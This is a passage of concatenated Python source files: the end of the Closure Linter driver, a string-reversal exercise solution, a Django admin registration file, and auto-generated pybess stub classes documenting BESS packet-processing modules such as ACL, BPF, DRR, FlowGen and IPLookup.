        if self.args.recurse:
            files += self.get_recursive_files()
        self.filter_files(files)

    def _multiprocess_check_paths(self, check_fn):
        """Run check_fn over multiple processes.

        Tokenization, passes, and checks are expensive operations. Running in
        a single process, they can only run on one CPU/core. Instead, shard
        out linting over all CPUs with multiprocessing to parallelize.

        Args:
          check_fn: Callable invoked per path.

        Yields:
          errorrecord.ErrorRecords for any found errors.
        """
        pool = multiprocessing.Pool()
        path_results = pool.imap(check_fn, self.paths)
        for results in path_results:
            for result in results:
                yield result
        # Force destruct before returning, as this can sometimes raise spurious
        # "interrupted system call" (EINTR), which we can ignore.
        try:
            pool.close()
            pool.join()
            del pool
        except OSError as err:
            # Bug fix: compare errno values with != (value equality), not
            # `is not` (object identity) — identity on ints is an
            # implementation accident.
            if err.errno != errno.EINTR:
                raise

    def _check_paths(self, check_fn):
        """Run check_fn on all paths in one thread.

        Args:
          check_fn: Callable invoked per path.

        Yields:
          errorrecord.ErrorRecords for any found errors.
        """
        for path in self.paths:
            results = check_fn(path)
            for record in results:
                yield record

    def _print_file_summary(self, records):
        """Print a detailed summary of the number of errors in each file."""
        paths = list(self.paths)
        paths.sort()
        for path in paths:
            path_errors = [e for e in records if e.path == path]
            print('%s: %d' % (path, len(path_errors)))

    @staticmethod
    def _print_file_separator(path):
        print('----- FILE : %s -----' % path)

    def _print_error_records(self, error_records):
        """Print error records strings in the expected format."""
        current_path = None
        for record in error_records:
            if current_path != record.path:
                current_path = record.path
                if not self.args.unix_mode:
                    self._print_file_separator(current_path)
            print(record.error_string)

    def _print_summary(self, paths, error_records):
        """Print a summary of the number of errors and files."""
        error_count = len(error_records)
        all_paths = set(paths)
        all_paths_count = len(all_paths)
        # Bug fix: use ==, not `is`, for integer comparison.
        if error_count == 0:
            print('%d files checked, no errors found.' % all_paths_count)
        new_error_count = len([e for e in error_records if e.new_error])
        error_paths = set([e.path for e in error_records])
        error_paths_count = len(error_paths)
        no_error_paths_count = all_paths_count - error_paths_count
        if (error_count or new_error_count) and not self.args.quiet:
            error_noun = 'error' if error_count == 1 else 'errors'
            new_error_noun = 'error' if new_error_count == 1 else 'errors'
            error_file_noun = 'file' if error_paths_count == 1 else 'files'
            ok_file_noun = 'file' if no_error_paths_count == 1 else 'files'
            print('Found %d %s, including %d new %s, in %d %s (%d %s OK).' %
                  (error_count,
                   error_noun,
                   new_error_count,
                   new_error_noun,
                   error_paths_count,
                   error_file_noun,
                   no_error_paths_count,
                   ok_file_noun))

    @staticmethod
    def _format_time(duration):
        """Formats a duration as a human-readable string.

        Args:
          duration: A duration in seconds.

        Returns:
          A formatted duration string.
        """
        if duration < 1:
            return '%dms' % round(duration * 1000)
        return '%.2fs' % duration

    def check(self):
        """Check the JavaScript files for style."""
        # NOTE(review): the append+nargs flags forwarded below are lists of
        # lists; check_path presumably flattens or tolerates that — confirm
        # before changing the forwarding here.
        check_path_p = partial(
            check_path,
            unix_mode=self.args.unix_mode,
            limited_doc_files=self.args.limited_doc_files,
            error_trace=self.args.error_trace,
            closurized_namespaces=self.args.closurized_namespaces,
            ignored_extra_namespaces=self.args.ignored_extra_namespaces,
            custom_jsdoc_tags=self.args.custom_jsdoc_tags,
            dot_on_next_line=self.args.dot_on_next_line,
            check_trailing_comma=self.args.check_trailing_comma,
            debug_indentation=self.args.debug_indentation,
            jslint_error=self.args.jslint_error,
            strict=self.args.strict,
            jsdoc=self.args.jsdoc,
            disable=self.args.disable,
            max_line_length=self.args.max_line_length)
        if self.args.singleprocess:
            records_iter = self._check_paths(check_path_p)
        else:
            records_iter = self._multiprocess_check_paths(check_path_p)
        records_iter, records_iter_copy = tee(records_iter, 2)
        self._print_error_records(records_iter_copy)
        error_records = list(records_iter)
        self._print_summary(self.paths, error_records)
        exit_code = 0
        # If there are any errors
        if error_records:
            exit_code += 1
        # If there are any new errors
        if [r for r in error_records if r.new_error]:
            exit_code += 2
        if exit_code:
            if self.args.summary:
                self._print_file_summary(error_records)
            if self.args.beep:
                # Make a beep noise.
                sys.stdout.write(chr(7))
            # Write out instructions for using fixjsstyle script to fix some of
            # the reported errors.
            fix_args = []
            for flag in sys.argv[1:]:
                for go_flag in GJSLINT_ONLY_FLAGS:
                    if flag.startswith(go_flag):
                        break
                else:
                    fix_args.append(flag)
            if not self.args.quiet:
                print("""
Some of the errors reported by GJsLint may be auto-fixable using the
command fixjsstyle. Please double check any changes it makes and report
any bugs. The command can be run by executing:

fixjsstyle %s """ % ' '.join(fix_args))
        if self.args.time:
            print('Done in %s.' % self._format_time(time.time() -
                                                    self.start_time))
        sys.exit(exit_code)

    def fix(self):
        """Fix the code style of the JavaScript files."""
        fixer = ErrorFixer(
            dry_run=self.args.dry_run,
            disable_indentation_fixing=self.args.disable_indentation_fixing,
            fix_error_codes=self.args.fix_error_codes)
        # Check the list of files.
        for path in self.paths:
            fix_path(
                path,
                fixer,
                None,
                limited_doc_files=self.args.limited_doc_files,
                error_trace=self.args.error_trace,
                closurized_namespaces=self.args.closurized_namespaces,
                ignored_extra_namespaces=self.args.ignored_extra_namespaces,
                custom_jsdoc_tags=self.args.custom_jsdoc_tags,
                dot_on_next_line=self.args.dot_on_next_line,
                check_trailing_comma=self.args.check_trailing_comma,
                debug_indentation=self.args.debug_indentation,
                jslint_error=self.args.jslint_error,
                strict=self.args.strict,
                jsdoc=self.args.jsdoc,
                disable=self.args.disable,
                max_line_length=self.args.max_line_length)
def fix():
    """Automatically fix simple style guide violations."""
    JsCodeStyle().fix()
def main():
    """Entry point when invoked as a command line script."""
    JsCodeStyle().check()


if __name__ == '__main__':
    main()
| 20,820 | 5,817 |
#!/usr/bin/python
# -*- coding:utf-8 -*-
'''
编写一个函数,其作用是将输入的字符串反转过来。
示例 1:
输入: "hello"
输出: "olleh"
示例 2:
输入: "A man, a plan, a canal: Panama"
输出: "amanaP :lanac a ,nalp a ,nam A"
'''
class Solution:
    """Reverse a string.

    Example: "hello" -> "olleh";
    "A man, a plan, a canal: Panama" -> "amanaP :lanac a ,nalp a ,nam A".
    """

    def reverseString(self, s):
        """Return *s* with its characters in reverse order.

        :param s: str
        :return: str
        """
        return ''.join(reversed(s))
| 326 | 161 |
from django.contrib import admin
from .models import Profile,Neighborhood,Posts,Business
# Register your models here.
# Expose the app's models in the Django admin interface.
admin.site.register(Profile)
admin.site.register(Neighborhood)
admin.site.register(Posts)
admin.site.register(Business)
# NOTE(review): leftover registrations for models that are not imported
# here; remove once confirmed unused.
# admin.site.register(DisLike)
# admin.site.register(MoringaMerch)
# admin.site.register(AwardsProject)
| 343 | 111 |
# This file is auto-genereated by bess-gen-doc.
# See https://github.com/nemethf/bess-gen-doc
#
# It is based on bess/protobuf/module_msg.proto, which has the following copyright.
# Copyright (c) 2016-2017, Nefeli Networks, Inc.
# Copyright (c) 2017, The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the names of the copyright holders nor the names of their
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from pybess.module import Module
from pybess.bess import BESS

# Module-level BESS client instance; presumably shared by the generated
# module classes below -- confirm against bess-gen-doc's output conventions.
bess = BESS()
class ACL(Module):
    """
    ACL module from NetBricks.
    The module ACL creates an access control module which by default blocks all traffic, unless it contains a rule which specifies otherwise.
    Examples of ACL can be found in [acl.bess](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/acl.bess)
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, rules=None):
        """
        Create an ACL module; by default it blocks all traffic unless a rule
        specifies otherwise.
        Examples of ACL can be found in [acl.bess](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/acl.bess)
        __Input Gates__: 1
        __Output Gates__: 1
        :param rules: A list of ACL rules.
        """
        pass
    def add(self, rules=None):
        """
        Add rules to the ACL module.
        :param rules: A list of ACL rules.
        """
        pass
    def clear(self):
        # NOTE(review): auto-generated stub with no docstring; presumably
        # removes all rules from the module (cf. BPF.clear) -- confirm
        # against module_msg.proto.
        pass
class ArpResponder(Module):
    """
    Respond to ARP requests and learn new MACs.
    The ARP Responder module responds to ARP requests.
    TODO: dynamically learn new MAC-IP mappings
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, ip=None, mac_addr=None):
        """
        The ARP Responder module responds to ARP requests.
        TODO: dynamically learn new MAC-IP mappings
        __Input Gates__: 1
        __Output Gates__: 1
        :param ip: One ARP IP-MAC mapping -- the IP address.
        :param mac_addr: The MAC address.
        """
        pass
    def add(self, ip=None, mac_addr=None):
        """
        Add one ARP IP-MAC mapping to the responder.
        :param ip: One ARP IP-MAC mapping -- the IP address.
        :param mac_addr: The MAC address.
        """
        pass
class BPF(Module):
    """
    Classifies packets with pcap-filter(7) syntax.
    The BPF module is an access control module that sends packets out on a particular gate based on whether they match a BPF filter.
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, filters=None):
        """
        The BPF module is an access control module that sends packets out on a particular gate based on whether they match a BPF filter.
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param filters: A list of BPF filters.
        """
        pass
    def add(self, filters=None):
        """
        Add BPF filters to the module.
        :param filters: A list of BPF filters.
        """
        pass
    def clear(self):
        """
        The BPF module has a command `clear()` that takes no parameters.
        This command removes all filters from the module.
        """
        pass
class Buffer(Module):
    """
    Buffers packets into larger batches.
    The Buffer module takes no parameters to initialize (i.e., `Buffer()` is sufficient to create one).
    Buffer accepts packets and stores them; it may forward them to the next module only after it has
    received enough packets to fill an entire PacketBatch.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        The Buffer module takes no parameters to initialize (i.e., `Buffer()` is sufficient to create one).
        Buffer accepts packets and stores them; it may forward them to the next module only after it has
        received enough packets to fill an entire PacketBatch.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass
class Bypass(Module):
    """
    Bypasses packets without any processing.
    The Bypass module forwards packets by emulating pre-defined packet processing overhead.
    It burns CPU cycles per batch, per packet, and per byte.
    Bypass is useful primarily for testing and performance evaluation.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, cycles_per_batch=None, cycles_per_packet=None, cycles_per_byte=None):
        """
        The Bypass module forwards packets by emulating pre-defined packet processing overhead.
        It burns CPU cycles per batch, per packet, and per byte.
        Bypass is useful primarily for testing and performance evaluation.
        __Input Gates__: 1
        __Output Gates__: 1
        :param cycles_per_batch: CPU cycles to burn for each packet batch.
        :param cycles_per_packet: CPU cycles to burn for each packet.
        :param cycles_per_byte: CPU cycles to burn for each byte.
        """
        pass
class DRR(Module):
    """
    Deficit Round Robin.
    The module DRR provides fair scheduling of flows based on a quantum, which is the
    number of bytes allocated to each flow on each round of going through all flows.
    Examples can be found in [./bessctl/conf/samples/drr.bess]
    __Input_Gates__: 1
    __Output_Gates__: 1
    """
    def __init__(self, num_flows=None, quantum=None, max_flow_queue_size=None):
        """
        The module DRR provides fair scheduling of flows based on a quantum, which is the
        number of bytes allocated to each flow on each round of going through all flows.
        Examples can be found in [./bessctl/conf/samples/drr.bess]
        __Input_Gates__: 1
        __Output_Gates__: 1
        :param num_flows: Number of flows to handle in the module.
        :param quantum: The number of bytes to allocate to each flow on every round.
        :param max_flow_queue_size: The maximum size that any flow's queue can get.
        """
        pass
    def set_quantum_size(self, quantum=None):
        """
        The SetQuantumSize function sets a new quantum for the DRR module to operate on.
        :param quantum: The number of bytes to allocate to each flow on every round.
        """
        pass
    def set_max_flow_queue_size(self, max_queue_size=None):
        """
        The SetMaxQueueSize function sets a new maximum flow queue size for the DRR module.
        If a flow's queue gets to this size, the module starts dropping packets to
        that flow until the queue is below this size.
        :param max_queue_size: The maximum size that any flow's queue can get.
        """
        pass
class Dump(Module):
    """
    Dump packet data and metadata attributes.
    The Dump module blindly forwards packets without modifying them. It periodically samples a packet and prints it out to the BESS log (by default stored in `/tmp/bessd.INFO`).
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, interval=None):
        """
        The Dump module blindly forwards packets without modifying them. It periodically samples a packet and prints it out to the BESS log (by default stored in `/tmp/bessd.INFO`).
        __Input Gates__: 1
        __Output Gates__: 1
        :param interval: How frequently to sample and print a packet, in seconds.
        """
        pass
    def set_interval(self, interval=None):
        """
        Change the sampling interval of the Dump module.
        :param interval: How frequently to sample and print a packet, in seconds.
        """
        pass
class EtherEncap(Module):
    """
    Encapsulates packets with an Ethernet header.
    The EtherEncap module wraps packets in an Ethernet header, but it takes no parameters. Instead, Ethernet source, destination, and type are pulled from a packet's metadata attributes.
    For example: `SetMetadata('dst_mac', 11:22:33:44:55) -> EtherEncap()`
    This is useful when upstream modules wish to assign a MAC address to a packet, e.g., due to an ARP request.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        The EtherEncap module wraps packets in an Ethernet header, but it takes no parameters. Instead, Ethernet source, destination, and type are pulled from a packet's metadata attributes.
        For example: `SetMetadata('dst_mac', 11:22:33:44:55) -> EtherEncap()`
        This is useful when upstream modules wish to assign a MAC address to a packet, e.g., due to an ARP request.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass
class ExactMatch(Module):
    """
    Multi-field classifier with an exact match table.
    The ExactMatch module splits packets along output gates according to exact match values in arbitrary packet fields.
    To instantiate an ExactMatch module, you must specify which fields in the packet to match over. You can add rules using the function `ExactMatch.add(...)`
    Fields may be stored either in the packet data or its metadata attributes.
    An example script using the ExactMatch code is found
    in [`bess/bessctl/conf/samples/exactmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/exactmatch.bess).
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, fields=None, masks=None):
        """
        The ExactMatch module splits packets along output gates according to exact match values in arbitrary packet fields.
        To instantiate an ExactMatch module, you must specify which fields in the packet to match over. You can add rules using the function `ExactMatch.add(...)`
        Fields may be stored either in the packet data or its metadata attributes.
        An example script using the ExactMatch code is found
        in [`bess/bessctl/conf/samples/exactmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/exactmatch.bess).
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param fields: A list of ExactMatch fields.
        :param masks: mask(i) corresponds to the mask for field(i)
        """
        pass
    def get_initial_arg(self):
        # NOTE(review): auto-generated stub with no docstring; presumably
        # returns the module's construction-time arguments -- confirm
        # against module_msg.proto.
        pass
    def get_runtime_config(self):
        # NOTE(review): presumably returns an ExactMatchConfig (see
        # set_runtime_config below) -- confirm against module_msg.proto.
        pass
    def set_runtime_config(self, default_gate=None, rules=None):
        """
        ExactMatchConfig represents the current runtime configuration
        of an ExactMatch module, as returned by get_runtime_config and
        set by set_runtime_config.
        :return: ExactMatchConfig represents the current runtime configuration
        of an ExactMatch module, as returned by get_runtime_config and
        set by set_runtime_config.
        """
        pass
    def add(self, gate=None, fields=None):
        """
        The ExactMatch module has a command `add(...)` that takes two parameters.
        The ExactMatch initializer specifies what fields in a packet to inspect; add() specifies
        which values to check for over these fields.
        add() inserts a new rule into the ExactMatch module such that traffic matching
        that bytestring will be forwarded
        out a specified gate.
        Example use: `add(fields=[aton('12.3.4.5'), aton('5.4.3.2')], gate=2)`
        :param gate: The gate to forward out packets that match this rule.
        :param fields: The exact match values to check for.
        """
        pass
    def delete(self, fields=None):
        """
        The ExactMatch module has a command `delete(...)` which deletes an existing rule.
        Example use: `delete(fields=[aton('12.3.4.5'), aton('5.4.3.2')])`
        :param fields: The field values for the rule to be deleted.
        """
        pass
    def clear(self):
        """
        The ExactMatch module has a command `clear()` which takes no parameters.
        This command removes all rules from the ExactMatch module.
        """
        pass
    def set_default_gate(self, gate=None):
        """
        The ExactMatch module has a command `set_default_gate(...)` which takes one parameter.
        This command routes all traffic which does _not_ match a rule to a specified gate.
        Example use in bessctl: `setDefaultGate(gate=2)`
        :param gate: The gate number to send the default traffic out.
        """
        pass
class FlowGen(Module):
    """
    Generates packets on a flow basis.
    The FlowGen module generates simulated TCP flows of packets with correct SYN/FIN flags and sequence numbers.
    This module is useful for testing, e.g., a NAT module or other flow-aware code.
    Packets are generated off a base, "template" packet by modifying the IP src/dst and TCP src/dst. By default, only the ports are changed and will be modified by incrementing the template ports by up to 20000 more than the template values.
    __Input Gates__: 0
    __Output Gates__: 1
    """
    def __init__(self, template=None, pps=None, flow_rate=None, flow_duration=None, arrival=None, duration=None, quick_rampup=None, ip_src_range=None, ip_dst_range=None, port_src_range=None, port_dst_range=None):
        """
        The FlowGen module generates simulated TCP flows of packets with correct SYN/FIN flags and sequence numbers.
        This module is useful for testing, e.g., a NAT module or other flow-aware code.
        Packets are generated off a base, "template" packet by modifying the IP src/dst and TCP src/dst. By default, only the ports are changed and will be modified by incrementing the template ports by up to 20000 more than the template values.
        __Input Gates__: 0
        __Output Gates__: 1
        :param template: The packet "template". All data packets are derived from this template and contain the same payload.
        :param pps: The total number of packets per second to generate.
        :param flow_rate: The number of new flows to create every second. flow_rate must be <= pps.
        :param flow_duration: The lifetime of a flow in seconds.
        :param arrival: The packet arrival distribution -- must be either "uniform" or "exponential"
        :param duration: The flow duration distribution -- must be either "uniform" or "pareto"
        :param quick_rampup: Whether or not to populate the flow generator with initial flows (start generating full pps rate immediately) or to wait for new flows to be generated naturally (all flows have a SYN packet).
        :param ip_src_range: When generating new flows, FlowGen modifies the template packet by changing the IP src, incrementing it by at most ip_src_range (e.g., if the base packet is 10.0.0.1 and range is 5, it will generate packets with IPs 10.0.0.1-10.0.0.6).
        :param ip_dst_range: When generating new flows, FlowGen modifies the template packet by changing the IP dst, incrementing it by at most ip_dst_range.
        :param port_src_range: When generating new flows, FlowGen modifies the template packet by changing the TCP src port, incrementing it by at most port_src_range.
        :param port_dst_range: When generating new flows, FlowGen modifies the template packet by changing the TCP dst port, incrementing it by at most port_dst_range.
        """
        pass
    def update(self, template=None, pps=None, flow_rate=None, flow_duration=None, arrival=None, duration=None, quick_rampup=None, ip_src_range=None, ip_dst_range=None, port_src_range=None, port_dst_range=None):
        """
        Update the flow generation parameters; accepts the same arguments as
        the initializer.
        :param template: The packet "template". All data packets are derived from this template and contain the same payload.
        :param pps: The total number of packets per second to generate.
        :param flow_rate: The number of new flows to create every second. flow_rate must be <= pps.
        :param flow_duration: The lifetime of a flow in seconds.
        :param arrival: The packet arrival distribution -- must be either "uniform" or "exponential"
        :param duration: The flow duration distribution -- must be either "uniform" or "pareto"
        :param quick_rampup: Whether or not to populate the flow generator with initial flows (start generating full pps rate immediately) or to wait for new flows to be generated naturally (all flows have a SYN packet).
        :param ip_src_range: When generating new flows, FlowGen modifies the template packet by changing the IP src, incrementing it by at most ip_src_range (e.g., if the base packet is 10.0.0.1 and range is 5, it will generate packets with IPs 10.0.0.1-10.0.0.6).
        :param ip_dst_range: When generating new flows, FlowGen modifies the template packet by changing the IP dst, incrementing it by at most ip_dst_range.
        :param port_src_range: When generating new flows, FlowGen modifies the template packet by changing the TCP src port, incrementing it by at most port_src_range.
        :param port_dst_range: When generating new flows, FlowGen modifies the template packet by changing the TCP dst port, incrementing it by at most port_dst_range.
        """
        pass
    def set_burst(self, burst=None):
        """
        The FlowGen module has a command `set_burst(...)` that allows you to specify
        the maximum number of packets to be stored in a single PacketBatch released
        by the module.
        """
        pass
class GenericDecap(Module):
    """
    Remove specified bytes from the beginning of packets.
    The GenericDecap module strips off the first few bytes of data from a packet.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, bytes=None):
        """
        The GenericDecap module strips off the first few bytes of data from a packet.
        __Input Gates__: 1
        __Output Gates__: 1
        :param bytes: The number of bytes to strip off.
        """
        pass
class GenericEncap(Module):
    """
    Encapsulates packets with constant values and metadata attributes.
    The GenericEncap module adds a header to packets passing through it.
    Takes a list of fields. Each field is either:
    1. {'size': X, 'value': Y} (for constant values)
    2. {'size': X, 'attribute': Y} (for metadata attributes)
    e.g.: `GenericEncap([{'size': 4, 'value': 0xdeadbeef},
    {'size': 2, 'attribute': 'foo'},
    {'size': 2, 'value': 0x1234}])`
    will prepend a 8-byte header:
    `de ad be ef <xx> <xx> 12 34`
    where the 2-byte `<xx> <xx>` comes from the value of metadata attribute `'foo'`
    for each packet.
    An example script using GenericEncap is in [`bess/bessctl/conf/samples/generic_encap.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/generic_encap.bess).
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, fields=None):
        """
        The GenericEncap module adds a header to packets passing through it.
        Takes a list of fields. Each field is either:
        1. {'size': X, 'value': Y} (for constant values)
        2. {'size': X, 'attribute': Y} (for metadata attributes)
        e.g.: `GenericEncap([{'size': 4, 'value': 0xdeadbeef},
        {'size': 2, 'attribute': 'foo'},
        {'size': 2, 'value': 0x1234}])`
        will prepend a 8-byte header:
        `de ad be ef <xx> <xx> 12 34`
        where the 2-byte `<xx> <xx>` comes from the value of metadata attribute `'foo'`
        for each packet.
        An example script using GenericEncap is in [`bess/bessctl/conf/samples/generic_encap.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/generic_encap.bess).
        __Input Gates__: 1
        __Output Gates__: 1
        :param fields: The list of header fields described above.
        """
        pass
class HashLB(Module):
    """
    Splits packets on a flow basis with L2/L3/L4 header fields.
    The HashLB module partitions packets between output gates according to either
    a hash over their MAC src/dst (`mode='l2'`), their IP src/dst (`mode='l3'`), the full
    IP/TCP 5-tuple (`mode='l4'`), or the N-tuple defined by `fields`.
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, gates=None, mode=None, fields=None):
        """
        The HashLB module partitions packets between output gates according to either
        a hash over their MAC src/dst (`mode='l2'`), their IP src/dst (`mode='l3'`), the full
        IP/TCP 5-tuple (`mode='l4'`), or the N-tuple defined by `fields`.
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param gates: A list of gate numbers over which to partition packets
        :param mode: The mode (`'l2'`, `'l3'`, or `'l4'`) for the hash function.
        :param fields: A list of fields that define a custom tuple.
        """
        pass
    def set_mode(self, mode=None, fields=None):
        """
        The HashLB module has a command `set_mode(...)` which takes two parameters.
        The `mode` parameter specifies whether the load balancer will hash over the
        src/dest ethernet header (`'l2'`), over the src/dest IP addresses (`'l3'`), or over
        the flow 5-tuple (`'l4'`). Alternatively, if the `fields` parameter is set, the
        load balancer will hash over the N-tuple with the specified offsets and
        sizes.
        Example use in bessctl: `lb.set_mode('l2')`
        :param mode: What fields to hash over; `'l2'`, `'l3'`, and `'l4'` are the only valid values.
        :param fields: A list of fields that define a custom tuple.
        """
        pass
    def set_gates(self, gates=None):
        """
        The HashLB module has a command `set_gates(...)` which takes one parameter.
        This function takes in a list of gate numbers to send hashed traffic out over.
        Example use in bessctl: `lb.setGates(gates=[0,1,2,3])`
        :param gates: A list of gate numbers to load balance traffic over
        """
        pass
class IPChecksum(Module):
    """
    Recomputes the IPv4 checksum.
    """
class IPEncap(Module):
    """
    Encapsulates packets with an IPv4 header.
    Encapsulates a packet with an IP header, where IP src, dst, and proto are filled in
    by metadata values carried with the packet. Metadata attributes must include:
    ip_src, ip_dst, ip_proto, ip_nexthop, and ether_type.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        Encapsulates a packet with an IP header, where IP src, dst, and proto are filled in
        by metadata values carried with the packet. Metadata attributes must include:
        ip_src, ip_dst, ip_proto, ip_nexthop, and ether_type.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass
class IPLookup(Module):
    """
    Performs Longest Prefix Match on IPv4 packets.
    An IPLookup module performs LPM lookups over a packet destination.
    IPLookup takes no parameters to instantiate.
    To add rules to the IPLookup table, use `IPLookup.add()`
    __Input Gates__: 1
    __Output Gates__: many (configurable, depending on rule values)
    """
    def __init__(self, max_rules=None, max_tbl8s=None):
        """
        An IPLookup module performs LPM lookups over a packet destination.
        IPLookup takes no parameters to instantiate.
        To add rules to the IPLookup table, use `IPLookup.add()`
        __Input Gates__: 1
        __Output Gates__: many (configurable, depending on rule values)
        :param max_rules: Maximum number of rules (default: 1024)
        :param max_tbl8s: Maximum number of IP prefixes smaller than /24 (default: 128)
        """
        pass
    def add(self, prefix=None, prefix_len=None, gate=None):
        """
        The IPLookup module has a command `add(...)` which takes three parameters.
        This function accepts the routing rules -- CIDR prefix, CIDR prefix length,
        and what gate to forward matching traffic out on.
        Example use in bessctl: `table.add(prefix='10.0.0.0', prefix_len=8, gate=2)`
        :param prefix: The CIDR IP part of the prefix to match
        :param prefix_len: The prefix length
        :param gate: The number of the gate to forward matching traffic on.
        """
        pass
    def delete(self, prefix=None, prefix_len=None):
        """
        The IPLookup module has a command `delete(...)` which takes two parameters.
        This function accepts the routing rules -- CIDR prefix, CIDR prefix length.
        Example use in bessctl: `table.delete(prefix='10.0.0.0', prefix_len=8)`
        :param prefix: The CIDR IP part of the prefix to match
        :param prefix_len: The prefix length
        """
        pass
    def clear(self):
        """
        The IPLookup module has a command `clear()` which takes no parameters.
        This function removes all rules in the IPLookup table.
        Example use in bessctl: `myiplookuptable.clear()`
        """
        pass
class IPSwap(Module):
    """
    Swaps source/destination IP addresses and L4 ports.
    """
class L2Forward(Module):
    """
    Classifies packets with destination MAC address.
    An L2Forward module forwards packets to an output gate according to exact-match rules over
    an Ethernet destination.
    Note that this is _not_ a learning switch -- it forwards according to fixed
    routes specified by `add(..)`.
    __Input Gates__: 1
    __Output Gates__: many (configurable, depending on rules)
    """
    def __init__(self, size=None, bucket=None):
        """
        An L2Forward module forwards packets to an output gate according to exact-match rules over
        an Ethernet destination.
        Note that this is _not_ a learning switch -- it forwards according to fixed
        routes specified by `add(..)`.
        __Input Gates__: 1
        __Output Gates__: many (configurable, depending on rules)
        :param size: Configures the forwarding hash table -- total number of hash table entries.
        :param bucket: Configures the forwarding hash table -- total number of slots per hash value.
        """
        pass
    def add(self, entries=None):
        """
        The L2Forward module forwards traffic via exact match over the Ethernet
        destination address. The command `add(...)` allows you to specify a
        MAC address and which gate the L2Forward module should direct it out of.
        :param entries: A list of L2Forward entries.
        """
        pass
    def delete(self, addrs=None):
        """
        The L2Forward module has a function `delete(...)` to remove a rule
        from the MAC forwarding table.
        :param addrs: The address to remove from the forwarding table
        """
        pass
    def set_default_gate(self, gate=None):
        """
        For traffic reaching the L2Forward module which does not match a MAC rule,
        the function `set_default_gate(...)` allows you to specify a default gate
        to direct unmatched traffic to.
        :param gate: The default gate to forward traffic which matches no entry to.
        """
        pass
    def lookup(self, addrs=None):
        """
        The L2Forward module has a function `lookup(...)` to query what output gate
        a given MAC address will be forwarded to; it returns the gate ID number.
        :param addrs: The MAC address to query for
        :return: This message type provides the response to the L2Forward function `lookup(..)`.
        It returns the gate that a requested MAC address is currently assigned to.
        """
        pass
    def populate(self, base=None, count=None, gate_count=None):
        """
        The L2Forward module has a command `populate(...)` which allows for fast creation
        of the forwarding table given a range of MAC addresses. The function takes in a
        'base' MAC address, a count (number of MAC addresses), and a gate_id. The module
        will route all MAC addresses starting from the base address, up to the base+count address,
        round-robin over gate_count total gates.
        For example, `populate(base='11:22:33:44:00', count = 10, gate_count = 2)` would
        route addresses 11:22:33:44::(00, 02, 04, 06, 08) out gate 0 and the odd-suffixed
        addresses out gate 1.
        :param base: The base MAC address
        :param count: How many addresses beyond base to populate into the routing table
        :param gate_count: How many gates to create in the L2Forward module.
        """
        pass
class L4Checksum(Module):
    """
    Recomputes the TCP/IPv4 and UDP/IPv4 checksum.
    """
class MACSwap(Module):
    """
    Swaps source/destination MAC addresses.
    The MACSwap module takes no arguments. It swaps the src/destination MAC addresses
    within a packet.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        The MACSwap module takes no arguments. It swaps the src/destination MAC addresses
        within a packet.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass
class MPLSPop(Module):
    """
    Pop MPLS label.
    The MPLS pop module removes MPLS labels.
    __Input Gates__: 1
    __Output Gates__: 2
    """
    def __init__(self, remove_eth_header=None, next_eth_type=None):
        """
        The MPLS pop module removes MPLS labels.
        __Input Gates__: 1
        __Output Gates__: 2
        :param remove_eth_header: Remove the Ethernet header along with the pop.
        :param next_eth_type: The next Ethernet type to set.
        """
        pass
    def set(self, remove_eth_header=None, next_eth_type=None):
        """
        Update the MPLS pop configuration.
        :param remove_eth_header: Remove the Ethernet header along with the pop.
        :param next_eth_type: The next Ethernet type to set.
        """
        pass
class Measure(Module):
    """
    Measures packet latency (paired with Timestamp module).
